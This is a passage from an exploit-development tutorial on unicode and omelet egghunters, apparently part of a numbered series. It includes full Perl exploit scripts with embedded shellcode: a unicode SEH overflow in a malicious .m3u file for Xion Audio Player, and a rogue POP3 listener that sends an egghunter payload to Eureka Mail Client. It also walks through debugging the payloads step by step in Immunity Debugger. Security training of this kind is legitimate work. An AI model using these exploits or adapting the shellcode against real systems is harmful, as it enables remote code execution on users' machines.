We\u2019ll use the vulnerability in xion audio player 1.0 build 121 again (see tutorial part 7<\/a>) to demonstrate that this actually works. I\u2019m not going to repeat all steps to build the exploit and alignments, but I have included some details about it inside the exploit script itself. Building\/reading\/using this exploit requires you to really master the stuff explained in tutorial part 7. So if you don\u2019t understand yet, I would strongly suggest to either read it first, or skip this exploit and move on to the next chapter.<\/p>\n
# [*] Vulnerability : Xion Audio Player Local BOF\n# [*] Written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)\n# -----------------------------------------------------------------------\n# Exploit based on original unicode exploit from tutorial part 7\n# but this time<\/span> I'm using a unicode egghunter, just for phun !\n#\n# Script provided 'as is', without any warranty.\n# Use for educational purposes only.\n#\nmy<\/span> $sploitfile=\"corelansploit.m3u<\/span>\";\nmy<\/span> $junk = \"\\x41<\/span>\" x 254;  #offset<\/span> until we hit SEH\nmy<\/span> $nseh=\"\\x58\\x48<\/span>\"; #put something into eax - simulate nop\nmy<\/span> $seh=\"\\xf5\\x48<\/span>\"; #ppr from xion.exe - unicode compatible\n# will also simulate nop when executed\n# after p\/p\/r is executed, we end here\n# in order to be able to run the unicode decoder\n# we need to have eax pointing at our<\/span> decoder stub\n# we'll make eax point to our<\/span> buffer\n# we'll do<\/span> this by putting ebp in eax and then increase eax\n# until it points to our<\/span> egghunter\n#first, put ebp in eax (push<\/span> \/ pop<\/span>)\nmy<\/span> $align=\"\\x55<\/span>\";  #push<\/span> ebp\n$align=$align.\"\\x6d<\/span>\";   #align\/nop\n$align=$align.\"\\x58<\/span>\";   #pop<\/span> eax\n$align=$align.\"\\x6d<\/span>\";   #align\/nop\n#now increase the address in eax so it would point to our<\/span> buffer\n$align = $align.\"\\x05\\x10\\x11<\/span>\";   #add eax,11001300\n$align=$align.\"\\x6d<\/span>\";   #align\/nop\n$align=$align.\"\\x2d\\x02\\x11<\/span>\";   #sub<\/span> eax,11000200\n$align=$align.\"\\x6d<\/span>\";   #align\/nop\n#eax now points at egghunter\n#jump to eax now\nmy<\/span> $jump = \"\\x50<\/span>\";  #push<\/span> eax\n$jump=$jump.\"\\x6d<\/span>\"; #nop\/align\n$jump=$jump.\"\\xc3<\/span>\"; #ret\n#fill the space between here and eax\nmy<\/span> $padding=\"A<\/span>\" x 73;\n#this is what will be put at eax :\nmy<\/span> $egghunter =\"PPYAIAIAIAIAQATAXAZAPA3QADAZA<\/span>\".\n\"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA<\/span>\".\n\"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB<\/span>\".\n\"AB30APB944JB36CQ7ZKPKPORPR2JM2PXXMNNOLKUQJRT<\/span>\".\n\"ZOVXKPNPM0RT4KKJ6ORUZJFO2U9WKOZGA<\/span>\";\n\n# - ok so far the exploit looks the same as the one used in tutorial 7\n# except for the fact that the shellcode is the unicode version of\n# an egghunter looking for the \"0t0t<\/span>\" egg marker\n# the egghunter was converted to unicode using eax as basereg\n#\n# Between the egghunter and the shellcode that it should look for\n# I'll write<\/span> some garbage (a couple of X's in this case)\n# So we'll pretend the real shellcode is somewhere out there\n\nmy<\/span> $garbage = \"X<\/span>\" x 50; \n\n# real shellcode (venetian, uses EAX as basereg)\n# will spawn calc.exe\nmy<\/span> $shellcode=\"PPYAIAIAIAIAQATAXAZAPA3QADAZA<\/span>\".\n\"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAX<\/span>\".\n\"A58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABAB<\/span>\".\n\"ABAB30APB944JBKLK8OTKPKPM0DKOUOLTKSLM5SHKQJ<\/span>\".\n\"O4K0OLXTKQOMPKQZKOYTKP44KM1ZNNQY0V96L3TWPT4<\/span>\".\n\"KW7QHJLMKQWRZKL4OKQDNDKTBUIUTK1OO4KQJK1VTKL<\/span>\".\n\"LPK4K1OMLM1ZK4KMLTKKQJKSY1LMTKTGSNQWPRDTKOP<\/span>\".\n\"NPU5902XLLTKOPLLDK2PMLFMTKQXM8JKM94K3P6PM0K<\/span>\".\n\"PKP4KQXOLQONQL6QPPV59KH53GP3K0PQXJPDJM4QO2H<\/span>\".\n\"68KN4JLN0WKOK7QSC1RLQSKPA<\/span>\";\n# between the egg marker and shellcode, we need to align\n# so eax points at the beginning of the real shellcode\nmy<\/span> $align2 = \"\\x6d\\x57\\x6d\\x58\\x6d<\/span>\";  #nop, push<\/span> edi, nop, pop<\/span> eax, nop\n$align2 = $align2.\"\\xb9\\x1b\\xaa<\/span>\";  #mov ecx, 0xaa001b00\n$align2 = $align2.\"\\xe8\\x6d<\/span>\";  #add al,ch + nop  (increase eax with 1b)\n$align2 = $align2.\"\\x50\\x6d\\xc3<\/span>\";  #push<\/span> eax, nop, ret\n#eax now points at the real shellcode\n\n#fill up rest of space & trigger access violation\nmy<\/span> $filler = (\"\\xcc<\/span>\" x (15990-length<\/span>($shellcode)));\n\n#payload\nmy<\/span> $payload = $junk.$nseh.$seh.$align.$jump.$padding.$egghunter;\n$payload=$payload.$garbage.\"0t0t<\/span>\".$align2.$shellcode.$filler;\n\nopen<\/span>(myfile,\">$sploitfile<\/span>\");\nprint<\/span> myfile $payload;\nprint<\/span> \"Wrote <\/span>\" . length<\/span>($payload).\" bytes to $sploitfile\\n<\/span>\";\nclose<\/span>(myfile);<\/pre>\n
 <\/p>\n
\"image\"<\/a><\/p>\n
pwned !<\/p>\n
Note : if size is really an issue (for the final shellcode), you could make the alignment code a number of bytes shorter by using what is in edi already (instead of using eax as basereg. Of course you then need to generate the shellcode using edi as basereg), and by avoiding the push + ret instructions. You could simply make edi point to the address directly after the last alignment instruction with some simple instructions.<\/p><\/blockquote>\n
Another example of unicode (or venetian) egghunter code can be found here :http:\/\/www.pornosecurity.org\/blog\/exploiting-bittorrent<\/a> (demo at http:\/\/www.pornosecurity.org\/bittorrent\/bittorrent.html<\/a>)<\/p>\n
 <\/p>\n
 <\/p>\n
Some tips to debug this kind of exploits using Immunity Debugger :<\/h4>\n
This is a SEH based exploit, so when the app crashed, see where the SEH chain is and set a breakpoint at the chain. Pass the exception (Shift F9) to the application and the breakpoint will be hit. On my system, the seh chain was located at 0x0012f2ac<\/p>\n
\"image\"<\/a><\/p>\n
Trace through the instructions (F7) until you see that the decoder starts decoding the egghunter and writing the original instructions on the stack.<\/p>\n
\"image\"<\/a><\/p>\n
In my case, the decoder started writing the original egghunter to 0x0012f460.<\/p>\n
As soon as I could see the first instruction at 0x0012f460 (which is 66 81 CA and so on), I set a breakpoint at 0x0012f460.<\/p>\n
\"image\"<\/a><\/p>\n
Then press CTRL+F12. Breakpoint would be hit and you would land at 0x0012f460. The original egghunter is now recombined and will start searching for the marker.<\/p>\n
\"image\"<\/a><\/p>\n
At 0x0012f47b (see screenshot), we see the instruction that will be executed when the egg has been found. Set a new breakpoint on 0x0012f47b and press CTRL-F12 again.\u00a0\u00a0 If you end up at the breakpoint, then the egg has been found.\u00a0 Press F7 (trace) again to execute the next instructions until the jmp to edi is made.\u00a0 (the egghunter has put the address of the egg at EDI, and jmp edi now redirects flow to that location).\u00a0 When the jmp edi is made, we end at the last byte of the marker.<\/p>\n
This is where our second aligment code is placed.\u00a0 It will make eax point to the shellcode (decoder stub) and will then perform the push eax + ret<\/p>\n
\"image\"<\/a><\/p>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
Omelet egg hunter (All your eggs, even the broken ones, are belong to us !)<\/h3>\n
Huh ? Broken eggs ? What you say ?<\/h4>\n
What if you find yourself in a situation where you don\u2019t really have a big amount of memory space to host your shellcode, but you have multiple smaller spaces available \/ controlled by you ?\u00a0 In this scenario, dictated by shellcode fragmentation\u00a0 a technique called omelet egg hunting may work.<\/p>\n
In this technique, you would break up the actual shellcode in smaller pieces, deliver the pieces to memory, and launch the hunter code which would search all eggs, recombine then, and make an omelet \u2026 err \u2026 I mean it would execute the recombined shellcode.<\/p>\n
The basic concept behind omelet egg hunter is pretty much the same as with regular egg hunters, but there are 2 main differences :<\/p>\n
- the final shellcode is broken down in pieces (= multiple eggs)<\/p>\n
- the final shellcode is recombined before it is executed (so it\u2019s not executed directly after it has been found)<\/p>\n
In addition to that, the egghunter code (or omelet code) is significantly larger than a normal egghunter (around 90 bytes\u00a0 vs\u00a0\u00a0 between 30 and 60 bytes for a normal egghunter)<\/p>\n
This technique was documented by skylined (Berend-Jan Wever) here (Google Project files can be found here<\/a>.) Quote from Berend-Jan :<\/p>\n
It is similar to egg-hunt shellcode, but will search user-land address space for multiple smaller eggs and recombine them into one larger block of shellcode and execute it. This is useful in situation where you cannot inject a block of sufficient size into a target process to store your shellcode in one piece, but you can inject multiple smaller blocks and execute one of them.<\/p><\/blockquote>\n
How does it work?<\/h4>\n
The original shellcode needs to be split in smaller pieces\/eggs. Each egg needs to have a header that contains<\/p>\n
- the length of the egg<\/p>\n
- an index number<\/p>\n
- 3 marker bytes (use to detect the egg)<\/p>\n
The omelet shellcode\/egg hunter also needs to know what the size of the eggs is, how many eggs there will be, and what the 3 bytes are (tag or marker) that identifies an egg.<\/p>\n
When the omelet code executes, it will search through memory, look for all the eggs, and reproduces the original shellcode (before it was broken into pieces) at the bottom of the stack. When it has completed, it jumps to the reproduced shellcode and executes it.\u00a0\u00a0 The omelet code written by skylined injects custom SEH handlers in order to deal with access violations when reading memory.<\/p>\n
Luckily, skylined wrote a set of scripts to automate the entire process of breaking down shellcode in smaller eggs and produce the omelet code. Download the scripts here<\/a>. (The zip file contains the nasm file that contains the omelet hunter and a python script to create the eggs). If you don\u2019t have a copy of nasm, you can get a copy here<\/a>.<\/p>\n
I have unzipped the omelet code package to c:\\omelet.\u00a0 nasm is installed under \u201cc:\\program files\\nasm\u201d.<\/p>\n
Compile the nasm file to a binary file :<\/p>\n
C:\\omelet>\"c:\\program files\\nasm\\nasm.exe<\/span>\" -f bin -o w32_omelet.bin w32_SEH_omelet.asm -w+error<\/pre>\n
(you only need to do this one time. Once you have this file, you can use it for all exploits)<\/p>\n
How to implement the omelet egg hunter ?<\/h4>\n
1. Create a file that contains the shellcode<\/span><\/strong> that you want to execute in the end.\u00a0 (I used \u201cshellcode.bin\u201d)<\/p>\n
(You can use a script like this to generate the shellcode.bin file. Simply replace the $shellcode with your own shellcode and run the script. In my example, this shellcode will spawn calc.exe) :<\/p>\n
my<\/span> $scfile=\"shellcode.bin<\/span>\";\nmy<\/span> $shellcode=\"\\x89\\xe2\\xda\\xc1\\xd9\\x72\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49<\/span>\" .\n\"\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56<\/span>\" .\n\"\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41<\/span>\" .\n\"\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42<\/span>\" .\n\"\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x4a<\/span>\" .\n\"\\x48\\x50\\x44\\x43\\x30\\x43\\x30\\x45\\x50\\x4c\\x4b\\x47\\x35\\x47<\/span>\" .\n\"\\x4c\\x4c\\x4b\\x43\\x4c\\x43\\x35\\x43\\x48\\x45\\x51\\x4a\\x4f\\x4c<\/span>\" .\n\"\\x4b\\x50\\x4f\\x42\\x38\\x4c\\x4b\\x51\\x4f\\x47\\x50\\x43\\x31\\x4a<\/span>\" .\n\"\\x4b\\x51\\x59\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x43\\x31\\x4a\\x4e\\x50<\/span>\" .\n\"\\x31\\x49\\x50\\x4c\\x59\\x4e\\x4c\\x4c\\x44\\x49\\x50\\x43\\x44\\x43<\/span>\" .\n\"\\x37\\x49\\x51\\x49\\x5a\\x44\\x4d\\x43\\x31\\x49\\x52\\x4a\\x4b\\x4a<\/span>\" .\n\"\\x54\\x47\\x4b\\x51\\x44\\x46\\x44\\x43\\x34\\x42\\x55\\x4b\\x55\\x4c<\/span>\" .\n\"\\x4b\\x51\\x4f\\x51\\x34\\x45\\x51\\x4a\\x4b\\x42\\x46\\x4c\\x4b\\x44<\/span>\" .\n\"\\x4c\\x50\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x45\\x51\\x4a\\x4b\\x4c<\/span>\" .\n\"\\x4b\\x45\\x4c\\x4c\\x4b\\x45\\x51\\x4a\\x4b\\x4d\\x59\\x51\\x4c\\x47<\/span>\" .\n\"\\x54\\x43\\x34\\x48\\x43\\x51\\x4f\\x46\\x51\\x4b\\x46\\x43\\x50\\x50<\/span>\" .\n\"\\x56\\x45\\x34\\x4c\\x4b\\x47\\x36\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44<\/span>\" .\n\"\\x4c\\x4c\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x45\\x38\\x43<\/span>\" .\n\"\\x38\\x4b\\x39\\x4a\\x58\\x4c\\x43\\x49\\x50\\x42\\x4a\\x50\\x50\\x42<\/span>\" .\n\"\\x48\\x4c\\x30\\x4d\\x5a\\x43\\x34\\x51\\x4f\\x45\\x38\\x4a\\x38\\x4b<\/span>\" .\n\"\\x4e\\x4d\\x5a\\x44\\x4e\\x46\\x37\\x4b\\x4f\\x4d\\x37\\x42\\x43\\x45<\/span>\" .\n\"\\x31\\x42\\x4c\\x42\\x43\\x45\\x50\\x41\\x41<\/span>\";\n\nopen<\/span>(FILE,\">$scfile<\/span>\");\nprint<\/span> FILE $shellcode;\nclose<\/span>(FILE);\nprint<\/span> \"Wrote <\/span>\".length<\/span>($shellcode).\" bytes to file <\/span>\".$scfile.\"\\n<\/span>\";<\/pre>\n
Run the script. File shellcode.bin now contains the binary shellcode. (of course, if you want something else than calc, just replace the contents of $shellcode.<\/p>\n
 <\/p>\n
2. Convert the shellcode to eggs <\/span><\/strong><\/p>\n
Let\u2019s say we have figured out that we have a number of times of about 130 bytes of memory space at our disposal. So we need to cut the 303 bytes of code in 3 eggs (+ some overhead - so we could end up with 3 to 4 eggs).\u00a0 The maximum size of each egg is 127 bytes. We also need a marker. (6 bytes). We\u2019ll use 0xBADA55 as marker.<\/p>\n
Run the following command to create the shellcode :<\/p>\n
C:\\omelet>w32_SEH_omelet.py\nSyntax:\n    w32_SEH_omelet.py \"omelet bin file<\/span>\" \"shellcode bin file<\/span>\" \"output txt file<\/span>\"\n        [egg size] [marker bytes]\n\nWhere:\n    omelet bin file = The omelet shellcode stage binary code followed by three\n                      bytes of the offsets of the \"marker bytes<\/span>\", \"max index<\/span>\"\n                      and \"egg size<\/span>\" variables in the code.\n    shellcode bin file = The shellcode binary code you want to have stored in\n                      the eggs and reconstructed by the omelet shellcode stage\n                      code.\n    output txt file = The file you want the omelet egg-hunt code and the eggs\n                      to be written to (in text format<\/span>).\n    egg size =        The size of each<\/span> egg (legal values<\/span>: 6-127, default: 127)\n    marker bytes =    The value<\/span> you want to use<\/span> as a marker to distinguish the\n                      eggs from other data in user-land address space (legal\n                      values<\/span>: 0-0xFFFFFF, default value<\/span>: 0x280876)<\/pre>\n
=> in our case, the command could be :<\/p>\n
C:\\omelet>w32_SEH_omelet.py w32_omelet.bin shellcode.bin calceggs.txt 127 0xBADA55<\/pre>\n
Open the newly created file calceggs.txt. It contains<\/p>\n
- the omelet egghunter code (which should be executed and will hunt for the eggs)<\/p>\n
- the eggs that must be placed somewhere in memory.<\/p>\n
\"image\"<\/a><\/p>\n
If you look closer at the eggs, you\u2019ll see that<\/p>\n
- the first 5 bytes contain the size (0x7A = 122), index (0xFF - 0xFE - 0xFD), and the marker (0x55,0xDA,0xBA\u00a0 => 0xBADA55).\u00a0\u00a0 122 + 5 bytes header = 127 bytes<\/p>\n
- the next bytes in the egg are taken from the original shellcode from our calc.exe payload<\/p>\n
- in the the last egg, the remaining space is filled with 0x40<\/p>\n
3. Build the exploit<\/span><\/strong><\/p>\n
Let\u2019s test this concept in our Eureka Mail Client exploit. We\u2019ll put some garbage between the eggs to simulate that the eggs were placed at random locations in memory :<\/p>\n
use<\/span> Socket;\n#fill out the local<\/span> IP or hostname\n#which is used by Eureka EMail as POP<\/span>3 server\n#note : must be exact match !\nmy<\/span> $localserver = \"192.168.0.193<\/span>\";\n#calculate offset<\/span> to EIP\nmy<\/span> $junk = \"A<\/span>\" x (723 - length<\/span>($localserver));\nmy<\/span> $ret=pack<\/span>('V',0x7E47BCAF); #jmp esp from user32.dll\nmy<\/span> $padding = \"\\x90<\/span>\" x 1000;\nmy<\/span> $omelet_code = \"\\x31\\xFF\\xEB\\x23\\x51\\x64\\x89\\x20\\xFC\\xB0\\x7A\\xF2<\/span>\".\n\"\\xAE\\x50\\x89\\xFE\\xAD\\x35\\xFF\\x55\\xDA\\xBA\\x83\\xF8\\x03\\x77\\x0C\\x59<\/span>\".\n\"\\xF7\\xE9\\x64\\x03\\x42\\x08\\x97\\xF3\\xA4\\x89\\xF7\\x31\\xC0\\x64\\x8B\\x08<\/span>\".\n\"\\x89\\xCC\\x59\\x81\\xF9\\xFF\\xFF\\xFF\\xFF\\x75\\xF5\\x5A\\xE8\\xC7\\xFF\\xFF<\/span>\".\n\"\\xFF\\x61\\x8D\\x66\\x18\\x58\\x66\\x0D\\xFF\\x0F\\x40\\x78\\x06\\x97\\xE9\\xD8<\/span>\".\n\"\\xFF\\xFF\\xFF\\x31\\xC0\\x64\\xFF\\x50\\x08<\/span>\";\n\nmy<\/span> $egg1 = \"\\x7A\\xFF\\x55\\xDA\\xBA\\x89\\xE2\\xDA\\xC1\\xD9\\x72\\xF4\\x58\\x50<\/span>\".\n\"\\x59\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5A\\x56\\x54\\x58\\x33<\/span>\".\n\"\\x30\\x56\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\\x42<\/span>\".\n\"\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x58<\/span>\".\n\"\\x50\\x38\\x41\\x43\\x4A\\x4A\\x49\\x4B\\x4C\\x4A\\x48\\x50\\x44\\x43\\x30\\x43\\x30<\/span>\".\n\"\\x45\\x50\\x4C\\x4B\\x47\\x35\\x47\\x4C\\x4C\\x4B\\x43\\x4C\\x43\\x35\\x43\\x48\\x45<\/span>\".\n\"\\x51\\x4A\\x4F\\x4C\\x4B\\x50\\x4F\\x42\\x38\\x4C\\x4B\\x51\\x4F\\x47\\x50\\x43\\x31<\/span>\".\n\"\\x4A\\x4B\\x51\\x59\\x4C\\x4B\\x46\\x54\\x4C\\x4B\\x43<\/span>\";\n\nmy<\/span> $egg2 = \"\\x7A\\xFE\\x55\\xDA\\xBA\\x31\\x4A\\x4E\\x50\\x31\\x49\\x50\\x4C\\x59<\/span>\".\n\"\\x4E\\x4C\\x4C\\x44\\x49\\x50\\x43\\x44\\x43\\x37\\x49\\x51\\x49\\x5A\\x44\\x4D\\x43<\/span>\".\n\"\\x31\\x49\\x52\\x4A\\x4B\\x4A\\x54\\x47\\x4B\\x51\\x44\\x46\\x44\\x43\\x34\\x42\\x55<\/span>\".\n\"\\x4B\\x55\\x4C\\x4B\\x51\\x4F\\x51\\x34\\x45\\x51\\x4A\\x4B\\x42\\x46\\x4C\\x4B\\x44<\/span>\".\n\"\\x4C\\x50\\x4B\\x4C\\x4B\\x51\\x4F\\x45\\x4C\\x45\\x51\\x4A\\x4B\\x4C\\x4B\\x45\\x4C<\/span>\".\n\"\\x4C\\x4B\\x45\\x51\\x4A\\x4B\\x4D\\x59\\x51\\x4C\\x47\\x54\\x43\\x34\\x48\\x43\\x51<\/span>\".\n\"\\x4F\\x46\\x51\\x4B\\x46\\x43\\x50\\x50\\x56\\x45\\x34\\x4C\\x4B\\x47\\x36\\x50\\x30<\/span>\".\n\"\\x4C\\x4B\\x51\\x50\\x44\\x4C\\x4C\\x4B\\x44\\x30\\x45<\/span>\";\n\nmy<\/span> $egg3 = \"\\x7A\\xFD\\x55\\xDA\\xBA\\x4C\\x4E\\x4D\\x4C\\x4B\\x45\\x38\\x43\\x38<\/span>\".\n\"\\x4B\\x39\\x4A\\x58\\x4C\\x43\\x49\\x50\\x42\\x4A\\x50\\x50\\x42\\x48\\x4C\\x30\\x4D<\/span>\".\n\"\\x5A\\x43\\x34\\x51\\x4F\\x45\\x38\\x4A\\x38\\x4B\\x4E\\x4D\\x5A\\x44\\x4E\\x46\\x37<\/span>\".\n\"\\x4B\\x4F\\x4D\\x37\\x42\\x43\\x45\\x31\\x42\\x4C\\x42\\x43\\x45\\x50\\x41\\x41\\x40<\/span>\".\n\"\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40<\/span>\".\n\"\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40<\/span>\".\n\"\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40<\/span>\".\n\"\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40<\/span>\";\n\nmy<\/span> $garbage=\"This is a bunch of garbage<\/span>\" x 10;\n\nmy<\/span> $payload=$junk.$ret.$omelet_code.$padding.$egg1.$garbage.$egg2.$garbage.$egg3;\n\nprint<\/span> \"Payload : <\/span>\" . length<\/span>($payload).\" bytes\\n<\/span>\";\nprint<\/span> \"Omelet code : <\/span>\" . length<\/span>($omelet_code).\" bytes\\n<\/span>\";\nprint<\/span> \" Egg 1 : <\/span>\" . length<\/span>($egg1).\" bytes\\n<\/span>\";\nprint<\/span> \" Egg 2 : <\/span>\" . length<\/span>($egg2).\" bytes\\n<\/span>\";\nprint<\/span> \" Egg 3 : <\/span>\" . length<\/span>($egg3).\" bytes\\n<\/span>\";\n\n#set up listener on port 110\nmy<\/span> $port=110;\nmy<\/span> $proto=getprotobyname<\/span>('tcp');\nsocket<\/span>(SERVER,PF_INET,SOCK_STREAM,$proto);\nmy<\/span> $paddr=sockaddr_in($port,INADDR_ANY);\nbind<\/span>(SERVER,$paddr);\nlisten<\/span>(SERVER,SOMAXCONN);\nprint<\/span> \"[+] Listening on tcp port 110 [POP3]... \\n<\/span>\";\nprint<\/span> \"[+] Configure Eureka Mail Client to connect to this host \\n<\/span>\";\nmy<\/span> $client_addr;\nwhile($client_addr=accept<\/span>(CLIENT,SERVER))\n{\n  print<\/span> \"[+] Client connected, sending evil payload\\n<\/span>\";\n  while(1)\n  {\n     print<\/span> CLIENT \"-ERR <\/span>\".$payload.\"\\n<\/span>\";\n\t print<\/span> \" -> Sent <\/span>\".length<\/span>($payload).\" bytes\\n<\/span>\";\n  }\n}\nclose<\/span> CLIENT;\nprint<\/span> \"[+] Connection closed\\n<\/span>\";<\/pre>\n
Run the script :<\/p>\n
C:\\sploits\\eureka>perl corelan_eurekasploit4.pl\nPayload     : 2700 bytes\nOmelet code : 85 bytes\n      Egg 1 : 127 bytes\n      Egg 2 : 127 bytes\n      Egg 3 : 127 bytes\n[+] Listening on tcp port 110 [POP<\/span>3]...\n[+] Configure Eureka Mail Client to connect<\/span> to this host<\/pre>\n
Result : Access Violation when reading [00000000]<\/p>\n
\"image\"<\/a><\/p>\n
When looking closer at the code, we see that the first instruction of the omelet code puts 00000000 in EDI (\\x31\\xFF = XOR EDI,EDI). When it starts reading at that address, we get an access violation. Despite the fact that the code uses custom SEH injection to handle access violations, this one was not handled and the exploit fails.<\/p>\n
Set a breakpoint at jmp esp (0x7E47BCAF) and run the exploit again.\u00a0 Take not of the registers when the jump to esp is made :<\/p>\n
\"image\"<\/a><\/p>\n
Ok, let\u2019s troubleshoot this. Start by locating the eggs in memory . After all, perhaps we can put another start address in EDI (other than zero), based on one of these registers and the place where the eggs are located, allowing the omelet code to work properly.<\/p>\n
First, write the 3 eggs to files (add the following lines of code in the exploit, before the listener is set up):<\/p>\n
open<\/span>(FILE,\">c:\\\\tmp\\\\egg1.bin<\/span>\");\nprint<\/span> FILE $egg1;\nclose<\/span>(FILE);\n\nopen<\/span>(FILE,\">c:\\\\tmp\\\\egg2.bin<\/span>\");\nprint<\/span> FILE $egg2;\nclose<\/span>(FILE);\n\nopen<\/span>(FILE,\">c:\\\\tmp\\\\egg3.bin<\/span>\");\nprint<\/span> FILE $egg3;\nclose<\/span>(FILE);<\/pre>\n
At the jmp esp breakpoint, run the following commands :<\/p>\n
!pvefindaddr compare c:\\tmp\\egg1.bin<\/p>\n
\"image\"<\/a><\/p>\n
!pvefindaddr compare c:\\tmp\\egg2.bin<\/p>\n
\"image\"<\/a><\/p>\n
!pvefindaddr compare c:\\tmp\\egg3.bin<\/p>\n
\"image\"<\/a><\/p>\n
Ok, so the 3 eggs are found in memory, and are not corrupted.<\/p>\n
Look at the addresses.\u00a0 One copy is found on the stack (0x0012????), other copies are elsewhere in memory (0x0047????). When we look back at the registers, taking into account that we need to find a register that is reliable, and positioned before the eggs, we see the following things :<\/p>\n
EAX 00000000\nECX 7C91005D ntdll.7C91005D\nEDX 00140608\nEBX 00450266 Eureka_E.00450266<\/span><\/strong>\nESP 0012CD6C\nEBP 00475BFC Eureka_E.00475BFC\nESI 00475BF8 Eureka_E.00475BF8\nEDI 00473678<\/span><\/strong> ASCII \"AAAAAAAAAAAAA<\/span>\"\nEIP 0012CD6C\nC 0  ES 0023 32bit 0(FFFFFFFF)\nP 0  CS 001B 32bit 0(FFFFFFFF)\nA 0  SS 0023 32bit 0(FFFFFFFF)\nZ 0  DS 0023 32bit 0(FFFFFFFF)\nS 0  FS 003B 32bit 7FFDF000(FFF)\nT 0  GS 0000 NULL\nD 0\nO 0  LastErr ERROR_INVALID_WINDOW_HANDLE (00000578)\nEFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)\nST0 empty -UNORM FB18 00000202 0000001B\nST1 empty -UNORM B7FC 00000000 F894BBD0\nST2 empty -UNORM A70E 06D90000 0120027F\nST3 empty +UNORM 1F80 00400000 BF8131CE\nST4 empty %#.19L\nST5 empty -UNORM CCB4 00000286 0000001B\nST6 empty 9.5000000000000000000\nST7 empty 19.000000000000000000\n               3 2 1 0      E S P U O Z D I\nFST 0120  Cond 0 0 0 1  Err 0 0 1 0 0 0 0 0  (LT)\nFCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1<\/pre>\n
EBX may be a good choice.\u00a0 But EDI is even better because it already contains a good address, located before the eggs.\u00a0\u00a0\u00a0 That means that we just have to leave the current value of EDI (instead of clearing it out) to reposition the omelet hunter.\u00a0 Quick fix : replace the xor edi,edi instruction with 2 nops.<\/p>\n
The changed omelet code in the exploit nows looks like this :<\/p>\n
my<\/span> $omelet_code = \"\\x90\\x90<\/span><\/strong>\\xEB\\x23\\x51\\x64\\x89\\x20\\xFC\\xB0\\x7A\\xF2<\/span>\".\n\"\\xAE\\x50\\x89\\xFE\\xAD\\x35\\xFF\\x55\\xDA\\xBA\\x83\\xF8\\x03\\x77\\x0C\\x59<\/span>\".\n\"\\xF7\\xE9\\x64\\x03\\x42\\x08\\x97\\xF3\\xA4\\x89\\xF7\\x31\\xC0\\x64\\x8B\\x08<\/span>\".\n\"\\x89\\xCC\\x59\\x81\\xF9\\xFF\\xFF\\xFF\\xFF\\x75\\xF5\\x5A\\xE8\\xC7\\xFF\\xFF<\/span>\".\n\"\\xFF\\x61\\x8D\\x66\\x18\\x58\\x66\\x0D\\xFF\\x0F\\x40\\x78\\x06\\x97\\xE9\\xD8<\/span>\".\n\"\\xFF\\xFF\\xFF\\x31\\xC0\\x64\\xFF\\x50\\x08<\/span>\";<\/pre>\n
Run the exploit again, (Eureka still attached to Immunity Debugger, and with breakpoint on jmp esp again). Breakpoint is hit, press F7 to start tracing. You should see the omelet code start (with 2 nops this time), and instruction \u201cREPNE SCAS BYTE PTR ES:[EDI]\u201d will continue to run until an egg is found.<\/p>\n
Based on the output of another \u201c!pvefindaddr compare c:\\tmp\\egg1.bin\u201d command, we should find the egg at 0x00473C5C<\/p>\n
When the first tag is found (and verified to be correct), a location on the stack is calculated (0x00126000 in my case), and the shellcode after the tag is copied to that location. ECX is now used as a counter (counts down to 0) so only the shellcode is copied and the omelet can continue when ECX reaches 0.<\/p>\n
\"image\"<\/a><\/p>\n
When the shellcode in egg1 is copied, (and we can see the garbage after egg1), the omelet code continues its search for part 2<\/p>\n
\"image\"<\/a><\/p>\n
This process repeats itself until all eggs are found and written on the stack.\u00a0 Instead of stopping the search, the omelet code just continues the search\u2026\u00a0 Result : we end up with an access violation again :<\/p>\n
\"image\"<\/a><\/p>\n
So, we know that the omelet code ran properly (we should be able to find the entire shellcode in memory somewhere), but it did not stop when it had to.\u00a0 First, verify that the shellcode in memory is indeed an exact copy of the original shellcode.<\/p>\n
We still have the shellcode.bin file that was created earlier (when building the omelet code). Copy the file to c:\\tmp and run this command in Immunity Debugger :<\/p>\n
!pvefindaddr compare c:\\tmp\\shellcode.bin<\/p>\n
\"image\"<\/a><\/p>\n
ok, the entire unmodified shellcode was indeed found at 0x00126000. That\u2019s great, because it proves that the omelet worked fine\u2026 it just did not stop searching, tripped at the end, fell flat on the floor and died.<\/p>\n
Damn<\/p>\n
Fixing the omelet code - welcome corelanc0d3r\u2019s omelet<\/h4>\n
